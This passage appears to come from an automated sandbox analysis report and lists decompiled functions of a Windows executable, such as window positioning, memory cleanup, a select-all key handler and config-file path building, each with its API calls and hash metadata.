                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@$free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2241099983-0
                                                                                                                    • Opcode ID: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                    • Instruction ID: 35b4881f8254e3ed5d778deec4dde62c4732b660dc94e1daad4ca6c431b67ac1
                                                                                                                    • Opcode Fuzzy Hash: fae72e90abf19a0f598a0744b86edfa2e5e81d8d411ebeda80197a1c121c0671
                                                                                                                    • Instruction Fuzzy Hash: 4E010233902D209BCA217B2A950541FB395FE82B24316807FE802772C5CF38AC618AED
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405CF8, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00405CF8(void* __esi, struct HWND__* _a4, signed int _a8) {
				intOrPtr _v12;
				struct tagPOINT _v20;
				struct tagRECT _v36;
				int _t27;
				struct HWND__* _t30;
				struct HWND__* _t32;

				_t30 = _a4;
				if((_a8 & 0x00000001) != 0) {
					_t32 = GetParent(_t30);
					GetWindowRect(_t30,  &_v20);
					GetClientRect(_t32,  &_v36);
					MapWindowPoints(0, _t32,  &_v20, 2);
					_t27 = _v36.right - _v12 - _v36.left;
					_v20.x = _t27;
					SetWindowPos(_t30, 0, _t27, _v20.y, 0, 0, 5);
				}
				if((_a8 & 0x00000002) != 0) {
					E00404FBB(_t30);
				}
				return 1;
			}









                                                                                                                    0x00405d03
                                                                                                                    0x00405d06
                                                                                                                    0x00405d10
                                                                                                                    0x00405d17
                                                                                                                    0x00405d22
                                                                                                                    0x00405d32
                                                                                                                    0x00405d40
                                                                                                                    0x00405d48
                                                                                                                    0x00405d4e
                                                                                                                    0x00405d54
                                                                                                                    0x00405d59
                                                                                                                    0x00405d5c
                                                                                                                    0x00405d61
                                                                                                                    0x00405d67

                                                                                                                    APIs
                                                                                                                    • GetParent.USER32(?), ref: 00405D0A
                                                                                                                    • GetWindowRect.USER32 ref: 00405D17
                                                                                                                    • GetClientRect.USER32 ref: 00405D22
                                                                                                                    • MapWindowPoints.USER32 ref: 00405D32
                                                                                                                    • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00405D4E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Rect$ClientParentPoints
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4247780290-0
                                                                                                                    • Opcode ID: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                    • Instruction ID: c328b93d85e4c90ccc2b92edbac8192aeb41fc184e748709fb0c9a3f9f2b3a5a
                                                                                                                    • Opcode Fuzzy Hash: a641cd19a410ed6a125ee0f2f41aa3775212a32dac042a11be58197803c42fc2
                                                                                                                    • Instruction Fuzzy Hash: 41012932801029BBDB119BA59D8DEFFBFBCEF46750F04822AF901A2151D73895028BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004083DC, Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 89%
                                                                                                                    			E004083DC(void* __eax, int __ebx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _v16;
				void* _t20;
				void* _t21;
				signed int _t28;
				void* _t32;
				void* _t34;

				_t20 = __eax;
				_v12 = _v12 & 0x00000000;
				_push(__ebx);
				_t28 = __eax - 1;
				L0040B26C();
				_v16 = __eax;
				if(_t28 > 0) {
					_t21 = _a4;
					_v8 = __ebx;
					_v8 =  ~_v8;
					_t32 = _t28 * __ebx + _t21;
					_a4 = _t21;
					do {
						memcpy(_v16, _a4, __ebx);
						memcpy(_a4, _t32, __ebx);
						_t20 = memcpy(_t32, _v16, __ebx);
						_a4 = _a4 + __ebx;
						_t32 = _t32 + _v8;
						_t34 = _t34 + 0x24;
						_v12 = _v12 + 1;
						_t28 = _t28 - 1;
					} while (_t28 > _v12);
				}
				_push(_v16);
				L0040B272();
				return _t20;
			}











                                                                                                                    0x004083dc
                                                                                                                    0x004083e2
                                                                                                                    0x004083e9
                                                                                                                    0x004083ea
                                                                                                                    0x004083eb
                                                                                                                    0x004083f3
                                                                                                                    0x004083f6
                                                                                                                    0x004083f8
                                                                                                                    0x00408401
                                                                                                                    0x00408404
                                                                                                                    0x00408407
                                                                                                                    0x00408409
                                                                                                                    0x0040840c
                                                                                                                    0x00408413
                                                                                                                    0x0040841d
                                                                                                                    0x00408427
                                                                                                                    0x0040842c
                                                                                                                    0x0040842f
                                                                                                                    0x00408432
                                                                                                                    0x00408435
                                                                                                                    0x00408438
                                                                                                                    0x00408439
                                                                                                                    0x0040843e
                                                                                                                    0x0040843f
                                                                                                                    0x00408442
                                                                                                                    0x0040844a

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memcpy$??2@??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1252195045-0
                                                                                                                    • Opcode ID: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                    • Instruction ID: 529a25ebd12540bef40c4bbbf5f662c822a20cdbd1f214c79cf6c3b5efc5d95d
                                                                                                                    • Opcode Fuzzy Hash: ae14ed78cb3b9c7a1656bdd7c9bb9ccf218141e25ab2435f791856beeb738110
                                                                                                                    • Instruction Fuzzy Hash: 61017176C0410CBBCF006F99D8859DEBBB8EF40394F1080BEF80476161D7355E519B98
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00406746, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 76%
                                                                                                                    			E00406746(void* __esi) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t18;
				void* _t19;

				_t19 = __esi;
				_t9 =  *((intOrPtr*)(__esi + 0x30));
				if(_t9 != 0) {
					_push(_t9);
					L0040B272();
				}
				_t10 =  *((intOrPtr*)(_t19 + 0x40));
				if(_t10 != 0) {
					_push(_t10);
					L0040B272();
				}
				_t11 =  *((intOrPtr*)(_t19 + 0x2d4));
				if(_t11 != 0) {
					_push(_t11);
					L0040B272();
				}
				_t18 =  *((intOrPtr*)(_t19 + 0x2c0));
				if(_t18 != 0) {
					_t11 =  *_t18;
					if(_t11 != 0) {
						_push(_t11);
						L0040B272();
						 *_t18 = 0;
					}
					_push(_t18);
					L0040B272();
				}
				 *((intOrPtr*)(_t19 + 0x2c0)) = 0;
				 *((intOrPtr*)(_t19 + 0x30)) = 0;
				 *((intOrPtr*)(_t19 + 0x40)) = 0;
				 *((intOrPtr*)(_t19 + 0x2d4)) = 0;
				return _t11;
			}








                                                                                                                    0x00406746
                                                                                                                    0x00406746
                                                                                                                    0x0040674f
                                                                                                                    0x00406751
                                                                                                                    0x00406752
                                                                                                                    0x00406757
                                                                                                                    0x00406758
                                                                                                                    0x0040675d
                                                                                                                    0x0040675f
                                                                                                                    0x00406760
                                                                                                                    0x00406765
                                                                                                                    0x00406766
                                                                                                                    0x0040676e
                                                                                                                    0x00406770
                                                                                                                    0x00406771
                                                                                                                    0x00406776
                                                                                                                    0x00406777
                                                                                                                    0x0040677f
                                                                                                                    0x00406781
                                                                                                                    0x00406785
                                                                                                                    0x00406787
                                                                                                                    0x00406788
                                                                                                                    0x0040678e
                                                                                                                    0x0040678e
                                                                                                                    0x00406790
                                                                                                                    0x00406791
                                                                                                                    0x00406796
                                                                                                                    0x00406798
                                                                                                                    0x0040679e
                                                                                                                    0x004067a1
                                                                                                                    0x004067a4
                                                                                                                    0x004067ab

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??3@
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 613200358-0
                                                                                                                    • Opcode ID: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                    • Instruction ID: 2146815d826ad61a6329a34e2799f13692f9223f7a0132405705f454cb51ab02
                                                                                                                    • Opcode Fuzzy Hash: 086bdf89973be9db751c02ba5940a011d1fc21caf14060528ff21e4da5d0ecd6
                                                                                                                    • Instruction Fuzzy Hash: E1F0ECB2504701DBDB24AE7D99C881FA7E9BB05318B65087FF14AE3680C738B850461C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0040ABA5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 87%
                                                                                                                    			E0040ABA5(intOrPtr __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr _v12;
				void* __ebx;
				intOrPtr _t37;
				intOrPtr _t42;
				RECT* _t44;

				_push(__ecx);
				_push(__ecx);
				_t42 = __ecx;
				_v12 = __ecx;
				if(_a4 != 5) {
					if(_a4 != 0xf) {
						if(_a4 == 0x24) {
							_t37 = _a12;
							 *((intOrPtr*)(_t37 + 0x18)) = 0xc8;
							 *((intOrPtr*)(_t37 + 0x1c)) = 0xc8;
						}
					} else {
						E00402EC8(__ecx + 0x378);
					}
				} else {
					_v8 = BeginDeferWindowPos(3);
					_t44 = _t42 + 0x378;
					E00402E22(_t44, _t21, 0x65, 0, 0, 1, 1);
					E00402E22(_t44, _v8, 1, 1, 1, 0, 0);
					E00402E22(_t44, _v8, 2, 1, 1, 0, 0);
					EndDeferWindowPos(_v8);
					InvalidateRect( *(_t44 + 0x10), _t44, 1);
					_t42 = _v12;
				}
				return E00402CED(_t42, _a4, _a8, _a12);
			}









                                                                                                                    0x0040aba8
                                                                                                                    0x0040aba9
                                                                                                                    0x0040abb0
                                                                                                                    0x0040abb2
                                                                                                                    0x0040abb5
                                                                                                                    0x0040ac19
                                                                                                                    0x0040ac2c
                                                                                                                    0x0040ac2e
                                                                                                                    0x0040ac36
                                                                                                                    0x0040ac39
                                                                                                                    0x0040ac39
                                                                                                                    0x0040ac1b
                                                                                                                    0x0040ac21
                                                                                                                    0x0040ac21
                                                                                                                    0x0040abb7
                                                                                                                    0x0040abcb
                                                                                                                    0x0040abce
                                                                                                                    0x0040abd7
                                                                                                                    0x0040abe6
                                                                                                                    0x0040abf6
                                                                                                                    0x0040abfe
                                                                                                                    0x0040ac09
                                                                                                                    0x0040ac0f
                                                                                                                    0x0040ac12
                                                                                                                    0x0040ac4f

                                                                                                                    APIs
                                                                                                                    • BeginDeferWindowPos.USER32 ref: 0040ABBA
                                                                                                                      • Part of subcall function 00402E22: GetDlgItem.USER32 ref: 00402E32
                                                                                                                      • Part of subcall function 00402E22: GetClientRect.USER32 ref: 00402E44
                                                                                                                      • Part of subcall function 00402E22: DeferWindowPos.USER32(?,?,00000000,?,?,?,?,00000004), ref: 00402EB4
                                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040ABFE
                                                                                                                    • InvalidateRect.USER32(?,?,00000001), ref: 0040AC09
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: DeferWindow$Rect$BeginClientInvalidateItem
                                                                                                                    • String ID: $
                                                                                                                    • API String ID: 2498372239-3993045852
                                                                                                                    • Opcode ID: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                    • Instruction ID: c4de0c57513a3fc8bb763215dcca23c205eee760976c5819edcd99f4220bed98
                                                                                                                    • Opcode Fuzzy Hash: 3646c4f7f2df3bce7363561434de74107494107a1dc9a7f0debf38e758269ced
                                                                                                                    • Instruction Fuzzy Hash: 9A11ACB1544208FFEB229F51CD88DAF7A7CEB85788F10403EF8057A280C6758E52DBA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00403A73, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00403A73(void* __esi, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t14;

				if(_a8 == 0x100 && _a12 == 0x41) {
					GetKeyState(0xa2);
					if(E00403A60(0xa2) != 0 || E00403A60(0xa3) != 0) {
						if(E00403A60(0xa0) == 0 && E00403A60(0xa1) == 0 && E00403A60(0xa4) == 0) {
							_t14 = E00403A60(0xa5);
							if(_t14 == 0) {
								SendMessageW(_a4, 0xb1, _t14, 0xffffffff);
							}
						}
					}
				}
				return CallWindowProcW( *0x40f2f0, _a4, _a8, _a12, _a16);
			}




                                                                                                                    0x00403a7d
                                                                                                                    0x00403a8c
                                                                                                                    0x00403a9c
                                                                                                                    0x00403aba
                                                                                                                    0x00403adf
                                                                                                                    0x00403ae7
                                                                                                                    0x00403af4
                                                                                                                    0x00403af4
                                                                                                                    0x00403ae7
                                                                                                                    0x00403aba
                                                                                                                    0x00403a9c
                                                                                                                    0x00403b13

                                                                                                                    APIs
                                                                                                                    • GetKeyState.USER32(000000A2), ref: 00403A8C
                                                                                                                      • Part of subcall function 00403A60: GetKeyState.USER32(?), ref: 00403A64
                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00403AF4
                                                                                                                    • CallWindowProcW.USER32(?,00000100,?,?), ref: 00403B0C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: State$CallMessageProcSendWindow
                                                                                                                    • String ID: A
                                                                                                                    • API String ID: 3924021322-3554254475
                                                                                                                    • Opcode ID: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                    • Instruction ID: 3f4bab65c8f2f559ff61c6136e8e970ba349fdfc906a465d58382778652fa82c
                                                                                                                    • Opcode Fuzzy Hash: 7a91954c753d57b62ada695ad1095f0bf88fde31d04a203a00175be824b18610
                                                                                                                    • Instruction Fuzzy Hash: AC01483130430AAEFF11DFE59D02ADA3A5CAF15327F114036FA96B81D1DBB887506E59
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 004034F0, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 91%
                                                                                                                    			E004034F0(void* __ecx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v20;
				char _v1072;
				void _v3672;
				char _v4496;
				intOrPtr _v4556;
				char _v4560;
				void* __edi;
				void* __esi;
				intOrPtr* _t41;
				void* _t45;

				_t45 = __eflags;
				E0040B550(0x11cc, __ecx);
				E00402923( &_v4560);
				_v4560 = 0x40db44;
				E00406670( &_v4496, _t45);
				_v4496 = 0x40dab0;
				memset( &_v3672, 0, 0x10);
				E0040A909( &_v1072);
				_t41 = _a4;
				_v4556 = 0x71;
				if(E00402CD5( &_v4560,  *((intOrPtr*)(_t41 + 0x10))) != 0) {
					L0040B266();
					 *((intOrPtr*)( *_t41 + 4))(1, _v20, _t41 + 0x5b2c, 0xa);
				}
				_v4496 = 0x40dab0;
				_v4560 = 0x40db44;
				E004067AC( &_v4496);
				return E00402940( &_v4560);
			}













                                                                                                                    0x004034f0
                                                                                                                    0x004034f8
                                                                                                                    0x00403506
                                                                                                                    0x00403516
                                                                                                                    0x0040351c
                                                                                                                    0x00403531
                                                                                                                    0x00403537
                                                                                                                    0x00403545
                                                                                                                    0x0040354a
                                                                                                                    0x00403556
                                                                                                                    0x00403567
                                                                                                                    0x00403575
                                                                                                                    0x00403583
                                                                                                                    0x00403583
                                                                                                                    0x00403586
                                                                                                                    0x00403592
                                                                                                                    0x00403598
                                                                                                                    0x004035ac

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402923: memset.MSVCRT ref: 00402935
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066B9
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 004066E0
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406701
                                                                                                                      • Part of subcall function 00406670: ??2@YAPAXI@Z.MSVCRT ref: 00406722
                                                                                                                    • memset.MSVCRT ref: 00403537
                                                                                                                    • _ultow.MSVCRT ref: 00403575
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ??2@$memset$_ultow
                                                                                                                    • String ID: cf@$q
                                                                                                                    • API String ID: 3448780718-2693627795
                                                                                                                    • Opcode ID: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                    • Instruction ID: aa1ed1bb2df2d11c17fc3d40a8ec787ac421495c908f782690464d4e039b4fd8
                                                                                                                    • Opcode Fuzzy Hash: 5a770fb105266b5f281bf636f392918a38755f6c8491aba89f246a667f584aac
                                                                                                                    • Instruction Fuzzy Hash: 73113079A402186ACB24AB55DC41BCDB7B4AF45304F0084BAEB09771C1D7796E888FD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402F31, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00402F31(void* _a4) {
				void _v530;
				long _v532;
				void* __edi;
				wchar_t* _t15;
				intOrPtr _t18;
				short* _t19;
				void* _t29;

				_v532 = _v532 & 0x00000000;
				memset( &_v530, 0, 0x208);
				E00404AD9( &_v532);
				_t15 = wcsrchr( &_v532, 0x2e);
				if(_t15 != 0) {
					 *_t15 =  *_t15 & 0x00000000;
				}
				wcscat( &_v532, L".cfg");
				_t18 =  *0x40fa74; // 0x4101c8
				_t19 = _t18 + 0x5504;
				_t36 =  *_t19;
				_pop(_t29);
				if( *_t19 != 0) {
					E00404923(0x104,  &_v532, _t19);
					_pop(_t29);
				}
				return E00402FC6(_t29, _t36,  &_v532);
			}










                                                                                                                    0x00402f3a
                                                                                                                    0x00402f51
                                                                                                                    0x00402f60
                                                                                                                    0x00402f6f
                                                                                                                    0x00402f78
                                                                                                                    0x00402f7a
                                                                                                                    0x00402f7a
                                                                                                                    0x00402f8a
                                                                                                                    0x00402f8f
                                                                                                                    0x00402f94
                                                                                                                    0x00402f99
                                                                                                                    0x00402f9e
                                                                                                                    0x00402f9f
                                                                                                                    0x00402fad
                                                                                                                    0x00402fb2
                                                                                                                    0x00402fb2
                                                                                                                    0x00402fc5

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00402F51
                                                                                                                      • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                    • wcsrchr.MSVCRT ref: 00402F6F
                                                                                                                    • wcscat.MSVCRT ref: 00402F8A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                    • String ID: .cfg
                                                                                                                    • API String ID: 776488737-3410578098
                                                                                                                    • Opcode ID: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                    • Instruction ID: 9e44addaa5645187fa8e636e844442f878cb26b9c6a589516f43c5b5973a5f2a
                                                                                                                    • Opcode Fuzzy Hash: 728259185716957c59a96a9101d5f0e08b84084941d0fa3c3d1a3b0935b5c9f5
                                                                                                                    • Instruction Fuzzy Hash: D501487254420C9ADB20E755DD8AFCA73BCEB54314F1008BBA514F61C1D7F8AAC48A9C
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00407E24, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 64%
                                                                                                                    			E00407E24(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				signed short _v516;
				void _v1026;
				signed short _v1028;
				void* __esi;
				void* _t17;
				intOrPtr* _t26;
				signed short* _t28;

				_v516 = _v516 & 0x00000000;
				_t26 = __ecx;
				memset( &_v514, 0, 0x1fc);
				_v1028 = _v1028 & 0x00000000;
				memset( &_v1026, 0, 0x1fc);
				_t17 =  *((intOrPtr*)( *_t26 + 0x24))();
				_t28 =  &_v516;
				E00407250(_t28, _t17);
				_push(_t28);
				_push(L"</%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t26, _a4,  &_v1028);
			}











                                                                                                                    0x00407e2d
                                                                                                                    0x00407e46
                                                                                                                    0x00407e48
                                                                                                                    0x00407e4d
                                                                                                                    0x00407e5f
                                                                                                                    0x00407e6b
                                                                                                                    0x00407e6f
                                                                                                                    0x00407e75
                                                                                                                    0x00407e7c
                                                                                                                    0x00407e7d
                                                                                                                    0x00407e88
                                                                                                                    0x00407e8d
                                                                                                                    0x00407e8e
                                                                                                                    0x00407eaa

                                                                                                                    APIs
                                                                                                                    • memset.MSVCRT ref: 00407E48
                                                                                                                    • memset.MSVCRT ref: 00407E5F
                                                                                                                      • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                                                      • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                                                    • _snwprintf.MSVCRT ref: 00407E8E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                    • String ID: </%s>
                                                                                                                    • API String ID: 3400436232-259020660
                                                                                                                    • Opcode ID: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                    • Instruction ID: 202c728a503fdded71e402cbdefdfedacf6d04e10f6749ebe2a15fa747ba2321
                                                                                                                    • Opcode Fuzzy Hash: 8ed6d9153b8ab756a1282c4525cb1f33682d7d4062ac2741ec7bca21e753fd7d
                                                                                                                    • Instruction Fuzzy Hash: 820186B2D4012966D720A795CC46FEE766CEF44318F0004FABB08F71C2DB78AB458AD8
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00405E0A, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 77%
                                                                                                                    			E00405E0A(intOrPtr __ecx, void* __eflags, struct HWND__* _a4) {
				void _v8198;
				short _v8200;
				void* _t9;
				void* _t12;
				intOrPtr _t19;
				intOrPtr _t20;

				_t19 = __ecx;
				_t9 = E0040B550(0x2004, __ecx);
				_t20 = _t19;
				if(_t20 == 0) {
					_t20 =  *0x40fe24; // 0x0
				}
				_t25 =  *0x40fb90;
				if( *0x40fb90 != 0) {
					_v8200 = _v8200 & 0x00000000;
					memset( &_v8198, 0, 0x2000);
					_push(_t20);
					_t12 = 5;
					E00405E8D(_t12);
					if(E00405F39(_t19, _t25, L"caption",  &_v8200) != 0) {
						SetWindowTextW(_a4,  &_v8200);
					}
					return EnumChildWindows(_a4, E00405DAC, 0);
				}
				return _t9;
			}









                                                                                                                    0x00405e0a
                                                                                                                    0x00405e12
                                                                                                                    0x00405e18
                                                                                                                    0x00405e1c
                                                                                                                    0x00405e1e
                                                                                                                    0x00405e1e
                                                                                                                    0x00405e24
                                                                                                                    0x00405e2c
                                                                                                                    0x00405e2e
                                                                                                                    0x00405e44
                                                                                                                    0x00405e49
                                                                                                                    0x00405e4c
                                                                                                                    0x00405e4d
                                                                                                                    0x00405e68
                                                                                                                    0x00405e74
                                                                                                                    0x00405e74
                                                                                                                    0x00000000
                                                                                                                    0x00405e84
                                                                                                                    0x00405e8c

                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000007.00000002.277375754.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000007.00000002.277368466.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277388528.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277400417.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000007.00000002.277454544.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                    • String ID: caption
                                                                                                                    • API String ID: 1523050162-4135340389
                                                                                                                    • Opcode ID: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                    • Instruction ID: ff9fcce37bd20e8a069aa1bb12297d26d3abb42d57bfe77991e9b0a8e19eae59
                                                                                                                    • Opcode Fuzzy Hash: 8feeb8209b6c70e9adfa8bd3f92da79707fac4aecb0355a736b6ddf0df3d27b2
                                                                                                                    • Instruction Fuzzy Hash: 2DF04432940718AAEB20AB54DD4EB9B3668DB04754F0041B7BA04B61D2D7B8AE40CEDC
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                    Download Yara Rule
